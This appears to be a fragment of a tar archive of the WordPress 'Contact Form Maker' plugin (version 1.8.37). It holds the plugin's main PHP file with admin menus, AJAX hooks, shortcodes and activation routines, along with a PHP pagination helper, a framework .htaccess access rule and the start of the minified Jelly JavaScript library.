        if ($count_items != 0) {
          echo $count_items; ?> item<?php echo (($count_items == 1) ? '' : 's');
        }
        ?>
      </span>
      <?php
      if ($count_items > $limit) {
        $first_page = "first-page";
        $prev_page = "prev-page";
        $next_page = "next-page";
        $last_page = "last-page";
        if ($page_number == 1) {
          $first_page = "first-page disabled";
          $prev_page = "prev-page disabled";
          $next_page = "next-page";
          $last_page = "last-page";
        }
        if ($page_number >= $items_county) {
          $first_page = "first-page ";
          $prev_page = "prev-page";
          $next_page = "next-page disabled";
          $last_page = "last-page disabled";
        }
      ?>
      <span class="pagination-links">
        <a class="<?php echo $first_page; ?>" title="Go to the first page" onclick="fm_page(<?php echo $page_number; ?>,-2)">«</a>
        <a class="<?php echo $prev_page; ?>" title="Go to the previous page" onclick="fm_page(<?php echo $page_number; ?>,-1)">‹</a>
        <span class="paging-input">
          <span class="total-pages">
          <input class="current_page" id="current_page" name="current_page" value="<?php echo $page_number; ?>" onkeypress="return check_enter_key(event)" title="Go to the page" type="text" size="1" />
        </span> of 
        <span class="total-pages">
            <?php echo $items_county; ?>
          </span>
        </span>
        <a class="<?php echo $next_page ?>" title="Go to the next page" onclick="fm_page(<?php echo $page_number; ?>,1)">›</a>
        <a class="<?php echo $last_page ?>" title="Go to the last page" onclick="fm_page(<?php echo $page_number; ?>,2)">»</a>
        <?php
      }
      ?>
      </span>
    </div>
    <input type="hidden" id="page_number" name="page_number" value="<?php echo ((isset($_POST['page_number'])) ? (int) $_POST['page_number'] : 1); ?>" />
    <input type="hidden" id="search_or_not" name="search_or_not" value="<?php echo ((isset($_POST['search_or_not'])) ? esc_html($_POST['search_or_not']) : ''); ?>"/>
    <?php
  }

  public static function fm_redirect($url) {
    $url = html_entity_decode(wp_nonce_url($url, 'nonce_fmc', 'nonce_fmc'));
    ?>
    <script>
      window.location = "<?php echo $url; ?>";
    </script>
    <?php
    exit();
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}framework/.htaccess000044400000000424152434416630010345 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>contact-form-maker.php000060400000055053152434416630010762 0ustar00<?php
/**
 * Plugin Name: Contact Form Maker
 * Plugin URI: http://web-dorado.com/products/form-maker-wordpress.html
 * Description: WordPress Contact Form Maker is a simple contact form builder, which allows the user with almost no knowledge of programming to create and edit different type of contact forms.
 * Version: 1.8.37
 * Author: WebDorado
 * Author URI: http://web-dorado.com/
 * License: GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html
 */
define('WD_FMC_DIR', WP_PLUGIN_DIR . "/" . plugin_basename(dirname(__FILE__)));
define('WD_FMC_URL', plugins_url(plugin_basename(dirname(__FILE__))));

// Plugin menu.
function form_maker_options_panel_cfm() {
  if (!get_option('form_maker_pro_active', FALSE)) {
  add_menu_page('Contact Form Maker', 'Contact Form', 'manage_options', 'manage_fmc', 'form_maker_cfm', WD_FMC_URL . '/images/FormMakerLogo-16.png');

  $manage_page = add_submenu_page('manage_fmc', 'Manager', 'Manager', 'manage_options', 'manage_fmc', 'form_maker_cfm');
  add_action('admin_print_styles-' . $manage_page, 'form_maker_manage_styles_cfm');
  add_action('admin_print_scripts-' . $manage_page, 'form_maker_manage_scripts_cfm');

  $submissions_page = add_submenu_page('manage_fmc', 'Submissions', 'Submissions', 'manage_options', 'submissions_fmc', 'form_maker_cfm');
  add_action('admin_print_styles-' . $submissions_page, 'form_maker_cfm_submissions_styles');
  add_action('admin_print_scripts-' . $submissions_page, 'form_maker_cfm_submissions_scripts');

  $blocked_ips_page = add_submenu_page('manage_fmc', 'Blocked IPs', 'Blocked IPs', 'manage_options', 'blocked_ips_fmc', 'form_maker_cfm');
  add_action('admin_print_styles-' . $blocked_ips_page, 'form_maker_manage_styles_cfm');
  add_action('admin_print_scripts-' . $blocked_ips_page, 'form_maker_manage_scripts_cfm');

  $themes_page = add_submenu_page('manage_fmc', 'Themes', 'Themes', 'manage_options', 'themes_fmc', 'form_maker_cfm');
  add_action('admin_print_styles-' . $themes_page, 'form_maker_manage_styles_cfm');
  add_action('admin_print_scripts-' . $themes_page, 'form_maker_manage_scripts_cfm');

  $global_options_page = add_submenu_page('manage_fmc', 'Global Options', 'Global Options', 'manage_options', 'goptions_fmc', 'form_maker_cfm');
  add_action('admin_print_styles-' . $global_options_page, 'form_maker_manage_styles_cfm');
  add_action('admin_print_scripts-' . $global_options_page, 'form_maker_manage_scripts_cfm');
  
  $licensing_plugins_page = add_submenu_page('manage_fmc', 'Get Pro', 'Get Pro', 'manage_options', 'licensing_fmc', 'form_maker_cfm');

  add_submenu_page('manage_fmc', 'Featured Plugins', 'Featured Plugins', 'manage_options', 'featured_plugins_fmc', 'fmc_featured');
  add_submenu_page('manage_fmc', 'Featured Themes', 'Featured Themes', 'manage_options', 'featured_themes_fmc', 'fmc_featured_themes');
  
  $uninstall_page = add_submenu_page('manage_fmc', 'Uninstall', 'Uninstall', 'manage_options', 'uninstall_fmc', 'form_maker_cfm');
  add_action('admin_print_styles-' . $uninstall_page, 'form_maker_styles_cfm');
  add_action('admin_print_scripts-' . $uninstall_page, 'form_maker_scripts_cfm');
  }
}
add_action('admin_menu', 'form_maker_options_panel_cfm');

function form_maker_cfm() {
  if (function_exists('current_user_can')) {
    if (!current_user_can('manage_options')) {
      die('Access Denied');
    }
  }
  else {
    die('Access Denied');
  }
  require_once(WD_FMC_DIR . '/framework/WDW_FMC_Library.php');
  $page = WDW_FMC_Library::get('page');
  require_once(WD_FMC_DIR . '/framework/WDW_FMC_Library.php');

  if (($page != '') && (($page == 'manage_fmc') || ($page == 'submissions_fmc') || ($page == 'goptions_fmc') || ($page == 'blocked_ips_fmc') || ($page == 'themes_fmc') || ($page == 'licensing_fmc') || ($page == 'uninstall_fmc') || ($page == 'formcontactwindow') || ($page == 'featured_plugins_fmc') || ($page == 'extensions_fmc'))) {
    require_once (WD_FMC_DIR . '/admin/controllers/FMController' . ucfirst(strtolower($page)) . '.php');
    $controller_class = 'FMController' . ucfirst(strtolower($page));
    $controller = new $controller_class();
    $controller->execute();
  }
}

function fmc_featured() {
  if (function_exists('current_user_can')) {
    if (!current_user_can('manage_options')) {
      die('Access Denied');
    }
  }
  else {
    die('Access Denied');
  }
  require_once(WD_FMC_DIR . '/featured/featured.php');
  wp_register_style('fmc_featured', WD_FMC_URL . '/featured/style.css', array(), 'cfm-'.get_option("wd_form_maker_version"));
  wp_print_styles('fmc_featured');
  fmc_featured_page('contact-maker');
}

function fmc_featured_themes() {
  if (function_exists('current_user_can')) {
    if (!current_user_can('manage_options')) {
      die('Access Denied');
    }
  }
  else {
    die('Access Denied');
  }
  require_once(WD_FMC_DIR . '/featured/featured_themes.php');
  wp_register_style('fmc_featured_themes', WD_FMC_URL . '/featured/featured_themes.css', array(), 'cfm-'.get_option("wd_form_maker_version"));
  wp_print_styles('fmc_featured_themes');
  fmc_featured_themes_page('contact-form-maker');
}

function fmc_extensions() {
  if (function_exists('current_user_can')) {
    if (!current_user_can('manage_options')) {
      die('Access Denied');
    }
  }
  else {
    die('Access Denied');
  }
  require_once(WD_FMC_DIR . '/featured/featured.php');
  wp_register_style('fmc_featured', WD_FMC_URL . '/featured/style.css', array(), 'cfm-'.get_option("wd_form_maker_version"));
  wp_print_styles('fmc_featured');
  fmc_extensions_page('contact-form-maker');
}

add_action('wp_ajax_get_stats_fmc', 'form_maker_cfm'); //Show statistics
add_action('wp_ajax_generete_csv_fmc', 'form_maker_ajax_cfm'); // Export csv.
add_action('wp_ajax_generete_xml_fmc', 'form_maker_ajax_cfm'); // Export xml.
add_action('wp_ajax_FormMakerPreview_fmc', 'form_maker_ajax_cfm');
add_action('wp_ajax_formcontactwdcaptcha', 'form_maker_ajax_cfm'); // Generete captcha image and save it code in session.
add_action('wp_ajax_nopriv_formcontactwdcaptcha', 'form_maker_ajax_cfm'); // Generete captcha image and save it code in session for all users.
add_action('wp_ajax_formcontactwdmathcaptcha', 'form_maker_ajax_cfm'); // Generete math captcha image and save it code in session.
add_action('wp_ajax_nopriv_formcontactwdmathcaptcha', 'form_maker_ajax_cfm'); // Generete math captcha image and save it code in session for all users.
add_action('wp_ajax_frommapeditinpopup_fmc', 'form_maker_ajax_cfm'); // Open map in submissions.
add_action('wp_ajax_fromipinfoinpopup_fmc', 'form_maker_ajax_cfm'); // Open ip in submissions.
add_action('wp_ajax_FormMakerEditCSS_fmc', 'form_maker_ajax_cfm'); // Edit css from form options.


if ( is_admin() && ( ! defined( 'DOING_AJAX' ) || ! DOING_AJAX ) ) {
	require_once( 'fmc_admin_class.php' );
	include_once('contact_form_maker_notices_class.php');
	add_action( 'plugins_loaded', array( 'FMC_Admin', 'get_instance' ) );
}

function form_maker_ajax_cfm() {
  require_once(WD_FMC_DIR . '/framework/WDW_FMC_Library.php');
  $page = WDW_FMC_Library::get('action');
  if ($page != 'formcontactwdcaptcha' && $page != 'formcontactwdmathcaptcha' ) {
    if (function_exists('current_user_can')) {
      if (!current_user_can('manage_options')) {
        die('Access Denied');
      }
    }
    else {
      die('Access Denied');
    }
  }
  if ($page != '') {
    require_once (WD_FMC_DIR . '/admin/controllers/FMController' . ucfirst($page) . '.php');
    $controller_class = 'FMController' . ucfirst($page);
    $controller = new $controller_class();
    $controller->execute();
  }
}

// Add the Contact Form Maker button.
function form_maker_add_button_cfm($buttons) {
  if (!get_option('form_maker_pro_active', FALSE)) {
    array_push($buttons, "fmc_form_mce");
  }
  return $buttons;
}

// Register Contact Form Maker button.
function form_maker_register_cfm($plugin_array) {
  if (!get_option('form_maker_pro_active', FALSE)) {
    $url = WD_FMC_URL . '/js/form_maker_editor_button.js';
    $plugin_array["fmc_form_mce"] = $url;
  }
  return $plugin_array;
}

function form_maker_admin_ajax_cfm() {
  ?>
  <script>
    var form_maker_admin_ajax_cfm = '<?php echo add_query_arg(array('action' => 'formcontactwindow'), admin_url('admin-ajax.php')); ?>';
    var plugin_url = '<?php echo WD_FMC_URL; ?>';
    var fmc_plugin_url = '<?php echo WD_FMC_URL; ?>';
	var admin_url = '<?php echo admin_url('admin.php'); ?>';
  </script>
  <?php
}
add_action('admin_head', 'form_maker_admin_ajax_cfm');

function do_output_buffer_fmc() {
  ob_start();
}
 add_action('init', 'do_output_buffer_fmc');
 
add_shortcode('wd_contact_form', 'contact_fm_shortcode');
add_shortcode('contact_form', 'contact_fm_shortcode');
function contact_fm_shortcode($attrs) {
	ob_start();
	FMC_front_end_main($attrs);
	return str_replace(array("\r\n", "\n", "\r"), '', ob_get_clean());
}

function FMC_front_end_main($params) {
	$form_id =  isset($params['id']) ? (int)$params['id'] : '';
	if($form_id)
		wd_contact_form_maker($form_id);
	return;
}

add_shortcode('email_verification', 'fmc_email_verification_shortcode');
function fmc_email_verification_shortcode() {
	require_once(WD_FMC_DIR . '/framework/WDW_FMC_Library.php');
	require_once(WD_FMC_DIR . '/frontend/controllers/FMControllerVerify_email_fmc.php');
    $controller_class = 'FMontrollerVerify_email_fmc';
    $controller = new $controller_class();
    $controller->execute();
}

function wd_contact_form_maker($id) {
  require_once (WD_FMC_DIR . '/frontend/controllers/FMControllerForm_maker_fmc.php');
  $controller = new FMControllerForm_maker_fmc();
  $form = $controller->execute($id);
  echo $form;
}


// Add the Form Maker button to editor.
add_action('wp_ajax_formcontactwindow', 'form_maker_ajax_cfm');
add_filter('mce_external_plugins', 'form_maker_register_cfm');
add_filter('mce_buttons', 'form_maker_add_button_cfm', 0);

// Form Maker Widget.
if (class_exists('WP_Widget')) {
  require_once(WD_FMC_DIR . '/admin/controllers/FMControllerWidget_fmc.php');
//   add_action('widgets_init', create_function('', 'return register_widget("FMControllerWidget_fmc");'));
  add_action( 'widgets_init', 'FMControllerWidget_fmc' );
    function FMControllerWidget_fmc() {
    return register_widget('FMControllerWidget_fmc');
  }

// add_action('widgets_init', create_function('', 'return register_widget("Ctxt_init_Menu_Widget");'));
// add_action ( 'widgets_init', 'Ctxt_init_Menu_Widget' );
//     function Ctxt_init_Menu_Widget() {
//     return register_widget('Ctxt_Menu_Widget');
// }

}

// Register fmemailverification post type
add_action('init', 'register_fmcemailverification_cpt');
function register_fmcemailverification_cpt(){
	$args = array(
	  'public' => true,
	  'label'  => 'CFM Email Verification'
	);
	
	register_post_type( 'cfmemailverification', $args );
	if(!get_option('cfm_emailverification')) {	
		flush_rewrite_rules();
		add_option('cfm_emailverification', true);
	}
}

// Activate plugin.
function form_maker_activate_cfm() {
  $version = get_option("wd_form_maker_version");
  $new_version = '1.8.37';
  global $wpdb;
  if (!$version) {
	add_option("wd_form_maker_version", $new_version, '', 'no');
	if ($wpdb->get_var("SHOW TABLES LIKE '" . $wpdb->prefix . "formmaker'") == $wpdb->prefix . "formmaker") {
		$recaptcha_keys = $wpdb->get_row('SELECT `public_key`, `private_key` FROM ' . $wpdb->prefix . 'formmaker WHERE public_key!="" and private_key!=""', ARRAY_A);
		$public_key = isset($recaptcha_keys['public_key']) ? $recaptcha_keys['public_key'] : '';
		$private_key = isset($recaptcha_keys['private_key']) ? $recaptcha_keys['private_key'] : '';
		if (FALSE === $fmc_settings = get_option('fmc_settings')) {
			add_option('fmc_settings', array('public_key' => $public_key, 'private_key' => $private_key, 'csv_delimiter' => ','));	
		}
		
      require_once WD_FMC_DIR . "/contact_form_maker_update.php";
	  
	  
      form_maker_update_until_mvc();
      contact_form_maker_update('');
    }
    else {
	
      require_once WD_FMC_DIR . "/contact_form_maker_insert.php";
      contact_from_maker_insert();
	  add_option("wd_cfield_limit", '9', '', 'no');
	  $cf_email_verification_post = array(
		  'post_title'    => 'Email Verification',
		  'post_content'  => '[email_verification]',
		  'post_status'   => 'publish',
		  'post_author'   => 1,
		  'post_type'   => 'fmemailverification',
		);
		
		
	add_option('fmc_settings', array('public_key' => '', 'private_key' => '', 'csv_delimiter' => ','));
		
		
	  $cf_mail_verification_post_id = wp_insert_post( $cf_email_verification_post );
	  $wpdb->update($wpdb->prefix . "formmaker", array(
        'mail_verification_post_id' => $cf_mail_verification_post_id,
      ), array('id' => 1), array(
        '%d',
      ), array('%d'));
    }
  }
  elseif (version_compare($version, $new_version, '<')) {
   require_once WD_FMC_DIR . "/contact_form_maker_update.php";
    contact_form_maker_update($version);
    update_option("wd_form_maker_version", $new_version);
	$recaptcha_keys = $wpdb->get_row('SELECT `public_key`, `private_key` FROM ' . $wpdb->prefix . 'formmaker WHERE public_key!="" and private_key!=""', ARRAY_A);
	$public_key = isset($recaptcha_keys['public_key']) ? $recaptcha_keys['public_key'] : '';
	$private_key = isset($recaptcha_keys['private_key']) ? $recaptcha_keys['private_key'] : '';
	
	if (FALSE === $fmc_settings = get_option('fmc_settings')) {
		add_option('fmc_settings', array('public_key' => $public_key, 'private_key' => $private_key, 'csv_delimiter' => ','));	
	}
  }
  
  require_once WD_FMC_DIR . "/contact_form_maker_insert.php";
  install_demo_forms_fmc();
}
register_activation_hook(__FILE__, 'form_maker_activate_cfm');

if (!isset($_GET['action']) || $_GET['action'] != 'deactivate') {
  add_action('admin_init', 'form_maker_activate_cfm');
}

// Form Maker manage page styles.
function form_maker_manage_styles_cfm() {
  wp_admin_css('thickbox');
  wp_enqueue_style('form_maker_tables', WD_FMC_URL . '/css/form_maker_tables.css', array(), 'cfm-'.get_option("wd_form_maker_version"));
  wp_enqueue_style('form_maker_first', WD_FMC_URL . '/css/form_maker_first.css', array(), 'cfm-'.get_option("wd_form_maker_version"));
  wp_enqueue_style('form_maker_calendar-jos', WD_FMC_URL . '/css/calendar-jos.css');
  wp_enqueue_style('jquery-ui', WD_FMC_URL . '/css/jquery-ui-1.10.3.custom.css');
  wp_enqueue_style('jquery-ui-spinner', WD_FMC_URL . '/css/jquery-ui-spinner.css');
  wp_enqueue_style('form_maker_style', WD_FMC_URL . '/css/style.css', array(), 'cfm-'.get_option("wd_form_maker_version"));
  wp_enqueue_style('form_maker_codemirror', WD_FMC_URL . '/css/codemirror.css');
  wp_enqueue_style('form_maker_layout', WD_FMC_URL . '/css/form_maker_layout.css', array(), 'cfm-'.get_option("wd_form_maker_version"));
}
// Form Maker manage page scripts.
function form_maker_manage_scripts_cfm() {
  wp_enqueue_script('thickbox');
  global $wp_scripts;
  $fmc_settings = get_option('fmc_settings');
  $map_key = isset($fmc_settings['map_key']) ? $fmc_settings['map_key'] : '';
  if (isset($wp_scripts->registered['jquery'])) {
    $jquery = $wp_scripts->registered['jquery'];
    if (!isset($jquery->ver) OR version_compare($jquery->ver, '1.8.2', '<')) {
      wp_deregister_script('jquery');
      wp_register_script('jquery', FALSE, array('jquery-core', 'jquery-migrate'), '1.10.2' );
    }
  }
  wp_enqueue_script('jquery');
  wp_enqueue_script('jquery-ui-sortable');
  wp_enqueue_script('jquery-ui-widget');
  wp_enqueue_script('jquery-ui-slider');
  wp_enqueue_script('jquery-ui-spinner');

  // wp_enqueue_script('mootools', WD_FMC_URL . '/js/mootools.js', array(), '1.12');
  wp_enqueue_script('gmap_form_api', 'https://maps.google.com/maps/api/js?v=3.exp&key='.$map_key);
  wp_enqueue_script('gmap_form', WD_FMC_URL . '/js/if_gmap_back_end.js');

  wp_enqueue_script('form_maker_admin', WD_FMC_URL . '/js/form_maker_admin.js', array(), 'cfm-'.get_option("wd_form_maker_version"));
  wp_enqueue_script('form_maker_manage', WD_FMC_URL . '/js/form_maker_manage.js', array(), 'cfm-'.get_option("wd_form_maker_version"));

  wp_enqueue_script('form_maker_codemirror', WD_FMC_URL . '/js/layout/codemirror.js', array(), '2.3');
  wp_enqueue_script('form_maker_clike', WD_FMC_URL . '/js/layout/clike.js', array(), '1.0.0');
  wp_enqueue_script('form_maker_formatting', WD_FMC_URL . '/js/layout/formatting.js', array(), '1.0.0');
  wp_enqueue_script('form_maker_css', WD_FMC_URL . '/js/layout/css.js', array(), '1.0.0');
  wp_enqueue_script('form_maker_javascript', WD_FMC_URL . '/js/layout/javascript.js', array(), '1.0.0');
  wp_enqueue_script('form_maker_xml', WD_FMC_URL . '/js/layout/xml.js', array(), '1.0.0');
  wp_enqueue_script('form_maker_php', WD_FMC_URL . '/js/layout/php.js', array(), '1.0.0');
  wp_enqueue_script('form_maker_htmlmixed', WD_FMC_URL . '/js/layout/htmlmixed.js', array(), '1.0.0');

  wp_enqueue_script('Calendar', WD_FMC_URL . '/js/calendar/calendar.js', array(), '1.0');
  wp_enqueue_script('calendar_function', WD_FMC_URL . '/js/calendar/calendar_function.js');
  // wp_enqueue_script('form_maker_calendar_setup', WD_FMC_URL . '/js/calendar/calendar-setup.js');
}

// Form Maker submissions page styles.
function form_maker_cfm_submissions_styles() {
  wp_admin_css('thickbox');
  wp_enqueue_style('form_maker_tables', WD_FMC_URL . '/css/form_maker_tables.css', array(), 'cfm-'.get_option("wd_form_maker_version"));
  wp_enqueue_style('form_maker_calendar-jos', WD_FMC_URL . '/css/calendar-jos.css');
  wp_enqueue_style('jquery-ui', WD_FMC_URL . '/css/jquery-ui-1.10.3.custom.css', array(), '1.10.3');
  wp_enqueue_style('jquery-ui-spinner', WD_FMC_URL . '/css/jquery-ui-spinner.css', array(), '1.10.3');
  wp_enqueue_style('form_maker_style', WD_FMC_URL . '/css/style.css', array(), 'cfm-'.get_option("wd_form_maker_version"));
}
// Form Maker submissions page scripts.
function form_maker_cfm_submissions_scripts() {
  wp_enqueue_script('thickbox');
  global $wp_scripts;
  if (isset($wp_scripts->registered['jquery'])) {
    $jquery = $wp_scripts->registered['jquery'];
    if (!isset($jquery->ver) OR version_compare($jquery->ver, '1.8.2', '<')) {
      wp_deregister_script('jquery');
      wp_register_script('jquery', FALSE, array('jquery-core', 'jquery-migrate'), '1.10.2' );
    }
  }
  wp_enqueue_script('jquery');
  wp_enqueue_script( 'jquery-ui-progressbar' );
  wp_enqueue_script('jquery-ui-sortable');
  wp_enqueue_script('jquery-ui-widget');
  wp_enqueue_script('jquery-ui-slider');
  wp_enqueue_script('jquery-ui-spinner');
  wp_enqueue_script('jquery-ui-mouse');
  wp_enqueue_script('jquery-ui-core');

  // wp_enqueue_script('mootools', WD_FMC_URL . '/js/mootools.js', array(), '1.12');

  wp_enqueue_script('form_maker_admin', WD_FMC_URL . '/js/form_maker_admin.js', array(), 'cfm-'.get_option("wd_form_maker_version"));
  wp_enqueue_script('form_maker_manage', WD_FMC_URL . '/js/form_maker_manage.js', array(), 'cfm-'.get_option("wd_form_maker_version"));
  wp_enqueue_script('form_maker_submissions', WD_FMC_URL . '/js/form_maker_submissions.js', array(), 'cfm-'.get_option("wd_form_maker_version"));

  wp_enqueue_script('main', WD_FMC_URL . '/js/main.js', array(), 'cfm-'.get_option("wd_form_maker_version"));
  wp_enqueue_script('main_div_front_end', WD_FMC_URL . '/js/main_div_front_end.js', array(), 'cfm-'.get_option("wd_form_maker_version"));

  wp_enqueue_script('Calendar', WD_FMC_URL . '/js/calendar/calendar.js', array(), '1.0');
  wp_enqueue_script('calendar_function', WD_FMC_URL . '/js/calendar/calendar_function.js');
  // wp_enqueue_script('form_maker_calendar_setup', WD_FMC_URL . '/js/calendar/calendar-setup.js');
  
  wp_localize_script('main_div_front_end', 'fm_objectL10n', array(
    'plugin_url' => WD_FMC_URL
  ));
}

function form_maker_styles_cfm() {
  wp_enqueue_style('form_maker_tables', WD_FMC_URL . '/css/form_maker_tables.css', array(), 'cfm-'.get_option("wd_form_maker_version"));
}
function form_maker_scripts_cfm() {
  wp_enqueue_script('form_maker_admin', WD_FMC_URL . '/js/form_maker_admin.js', array(), 'cfm-'.get_option("wd_form_maker_version"));
}

$contact_form_maker_generate_action = 0;
function contact_form_maker_generate_action() {
  global $contact_form_maker_generate_action;
  $contact_form_maker_generate_action = 1;
}
add_filter('wp_head', 'contact_form_maker_generate_action', 10000);

function form_maker_front_end_scripts_cfm() {
	$fmc_settings = get_option('fmc_settings');
    $map_key = isset($fmc_settings['map_key']) ? $fmc_settings['map_key'] : '';
  // global $wp_scripts;
  // if (isset($wp_scripts->registered['jquery'])) {
    // $jquery = $wp_scripts->registered['jquery'];
    // if (!isset($jquery->ver) OR version_compare($jquery->ver, '1.8.2', '<')) {
      // wp_deregister_script('jquery');
      // wp_register_script('jquery', FALSE, array('jquery-core', 'jquery-migrate'), '1.10.2' );
    // }
  // }
  wp_enqueue_script('jquery');
  wp_enqueue_script('jquery-ui-widget');
  wp_enqueue_script('jquery-ui-slider');
  wp_enqueue_script('jquery-ui-spinner');
  wp_enqueue_script('jquery-effects-shake');

  wp_enqueue_style('jquery-ui', WD_FMC_URL . '/css/jquery-ui-1.10.3.custom.css');
  wp_enqueue_style('jquery-ui-spinner', WD_FMC_URL . '/css/jquery-ui-spinner.css');

  // wp_enqueue_script('mootools', WD_FMC_URL . '/js/mootools.js', array(), '1.12');
  wp_enqueue_script('gmap_form_api', 'https://maps.google.com/maps/api/js?v=3.exp&key='.$map_key);
  wp_enqueue_script('gmap_form', WD_FMC_URL . '/js/if_gmap_front_end.js');
  wp_enqueue_script('jelly.min', WD_FMC_URL . '/js/jelly.min.js');
  wp_enqueue_script('file-upload', WD_FMC_URL . '/js/file-upload.js');
  // wp_enqueue_style('gmap_styles_', WD_FMC_URL . '/css/style_for_map.css');

  wp_enqueue_script('Calendar', WD_FMC_URL . '/js/calendar/calendar.js');
  wp_enqueue_script('calendar_function', WD_FMC_URL . '/js/calendar/calendar_function.js');
  // wp_enqueue_script('form_maker_calendar_setup', WD_FMC_URL . '/js/calendar/calendar-setup.js');
  wp_enqueue_style('form_maker_calendar-jos', WD_FMC_URL . '/css/calendar-jos.css');
  wp_enqueue_style('form_maker_frontend', WD_FMC_URL . '/css/form_maker_frontend.css');

  wp_register_script('main_div_front_end', WD_FMC_URL . '/js/main_div_front_end.js', array(), 'cfm-'.get_option("wd_form_maker_version"));
  wp_enqueue_script('main_div_front_end', WD_FMC_URL . '/js/main_div_front_end.js', array(), 'cfm-'.get_option("wd_form_maker_version"));
  wp_register_script('main_front_end', WD_FMC_URL . '/js/main_front_end.js', array(), 'cfm-'.get_option("wd_form_maker_version"));
  wp_localize_script('main_div_front_end', 'fm_objectL10n', array(
    'plugin_url' => WD_FMC_URL
  ));
  wp_localize_script('main_front_end', 'fm_objectL10n', array(
    'plugin_url' => WD_FMC_URL
  ));
}
add_action('wp_enqueue_scripts', 'form_maker_front_end_scripts_cfm');

// Languages localization.
function form_maker_language_load_cfm() {
  load_plugin_textdomain('form_maker', FALSE, basename(dirname(__FILE__)) . '/languages');
}
add_action('init', 'form_maker_language_load_cfm');

?>js/jelly.min.js000060400000110335152434416630007426 0ustar00/*

Jelly JavaScript, Copyright (c) 2008-2009 Pete Boere.

MIT style license: http://www.opensource.org/licenses/mit-license.php
project page: http://code.google.com/p/jelly-javascript/
this build compiled: 2009-08-19 

*/
(function(){
/* base */
var au=window.JELLY={},ay=window,K=ay.document,aR=K.documentElement,F=K.getElementsByTagName("head")[0],N="addEventListener" in K,S="querySelectorAll" in K,W=function(){},aK=function(){var J=ay.navigator,a5=J.userAgent,bb="ActiveXObject" in ay,bc="XMLHttpRequest" in ay,a8="securityPolicy" in J,a7="taintEnabled" in J,a6=/opera/i.test(a5),a9=/firefox/i.test(a5),ba=/webkit/i.test(a5),Q=bb?(S?8:(bc?7:6)):0;return{ie:Q,ie6:Q===6,ie7:Q===7,ie8:Q===8,opera:a6,firefox:a9||(a8&&!bb&&!a6),webkit:ba||(!a7&&!bb&&!a6),safariMobile:/safari/i.test(a5)&&/mobile/i.test(a5),chrome:ba&&/chrome/i.test(a5)}}(),aB=aK.ie,aA=function(J){return typeof J!=="undefined"},Y=function(J){return typeof J==="undefined"},a1=function(J){return J===null},aQ=function(J){return typeof J==="boolean"},aY=function(J){return typeof J==="string"},U=function(J){return typeof J==="number"},ap=function(J){return U(J)?!(J%1):false},b=function(J){return U(J)?!!(J%1):false},p=function(J){return aY(J)||U(J)?/^\s*\d+\.?\d*?\s*$/.test((J+"")):false},H=function(J){return J+""==="[object Object]"},c=function(J){return !!J&&!H(J)&&(typeof J==="object"||aL(J))},aL=function(J){return{}.toString.call(J)==="[object Function]"},az=function(){if(!aB){return function(J){return c(J)&&!a(J)&&/^\[object HTML[A-Za-z]*Element\]$/.test(J+"")}}return function(J){return c(J)&&!!J.nodeName&&J.nodeType===1}}(),a0=function(){if(!aB){return function(J){return aI(J)&&/^\[object (HTMLCollection|NodeList)\]$/.test(J+"")}}return function(J){return aI(J)&&!!J.item}}(),a=function(J){return{}.toString.call(J)==="[object Array]"},aI=function(J){return c(J)&&!H(J)&&!a(J)&&!aL(J)&&ap(J.length)},x=function(Q,J){return J.indexOf(Q)!==-1},O=function(a5){var J=[],a6=a5.length,Q=0;for(Q;Q<a6;Q++){J[Q]=a5[Q]}return J},aN=function(J){if(aY(J)){return/^\s*$/.test(J)}else{if(a(J)){return !J.length}else{if(H(J)){return !Object.keys(J).length}}}return !J},av=function(Q,J,a5){for(var a6 in J){if(Y(Q[a6])||aA(Q[a6])&&a5!==false){Q[a6]=J[a6]}}return Q},aq=function(){var J=O(arguments),a5=J.shift(),Q=J.shift();return setTimeout(function(){a5.apply(Q,J)},0)},h=function(Q){var J=ay.console;if(J&&J[Q]){return function(){J[Q].apply(J,O(arguments))}}return W},d=h("log"),aH=h("warn"),ab=h("error");av(au,{browser:aK,isDefined:aA,isUndefined:Y,isNull:a1,isBoolean:aQ,isString:aY,isNumber:U,isInteger:ap,isFloat:b,isNumeric:p,isObject:H,isFunction:aL,isElement:az,isNodeList:a0,isArray:a,toArray:O,empty:aN,extend:av,log:d,logWarn:aH,logError:ab});
/* native extensions */
av(Array.prototype,{forEach:function(Q,a5){for(var J=0,a6=this.length;J<a6;J++){Q.call(a5,this[J],J,this)}},indexOf:function(Q,a6){a6=aA(a6)?(a6<0?Math.max(0,this.length+a6):a6):0;for(var J=a6,a5=this.length;J<a5;J++){if(this[J]===Q){return J}}return -1},filter:function(a5,a6){for(var Q=0,a7=this.length,J=[];Q<a7;Q++){if(a5.call(a6,this[Q],Q,this)){J.push(this[Q])}}return J},map:function(a5,a6){for(var Q=0,a7=this.length,J=[];Q<a7;Q++){J.push(a5.call(a6,this[Q],Q,this))}return J},some:function(Q,a5){for(var J=0,a6=this.length;J<a6;J++){if(Q.call(a5,this[J],J,this)){return true}}return false},every:function(Q,a5){for(var J=0,a6=this.length;J<a6;J++){if(!Q.call(a5,this[J],J,this)){return false}}return true}},false);Array.prototype.each=Array.prototype.forEach;av(String.prototype,{trim:function(){return this.replace(/^\s\s*/,"").replace(/\s\s*$/,"")}},false);av(Function.prototype,{bind:function(){if(arguments.length<2&&!aA(arguments[0])){return this}var J=O(arguments),a5=J.shift(),Q=this;return function(){for(var a7=0,a6=O(J);arguments.length>a7;a7++){a6.push(arguments[a7])}return Q.apply(a5,a6)}}},false);if(ay.HTMLElement&&HTMLElement.prototype){av(HTMLElement.prototype,{contains:function(J){return !!(this.compareDocumentPosition(J)&16)}},false)}av(Object,{keys:function(a5){var Q=[],J;for(J in a5){if(a5.hasOwnProperty(J)){Q.push(J)}}return Q}},false);
/* class */
